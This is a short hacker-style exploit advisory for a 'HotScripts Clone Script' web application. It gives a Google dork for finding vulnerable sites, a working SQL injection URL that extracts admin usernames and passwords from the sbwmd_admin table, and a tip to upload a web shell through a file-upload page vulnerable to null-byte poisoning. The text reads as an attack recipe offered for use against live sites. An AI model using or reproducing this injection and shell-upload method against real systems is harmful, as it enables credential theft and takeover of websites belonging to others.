--==+================================================================================+==-- --==+ HotScripts Clone Script SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: N/A DORK (google): "Software Categories" "Featured Resources" "Search" DESCRIPTION: Pull admin info from database, and maybe upload shell. EXPLOITS: www.site.com/software-description.php?id=-1/**/UNION/**/ALL/**/SELECT/**/concat(admin_name,char(58),pwd)/**/FROM/**/sbwmd_admin/* NOTE/TIP: admin login is at /siteadmin/ image upload /siteadmin/fileupload.php, its vulnerable to PHP Nullbyte posisoning. so upload shell. i know this doesnt look like a HotScripts clone but it is. GREETZ: milw0rm.com, H4CK-Y0u.org --==+================================================================================+==-- --==+ HotScripts Clone Script SQL Injection Vulnerbility +==-- --==+================================================================================+==--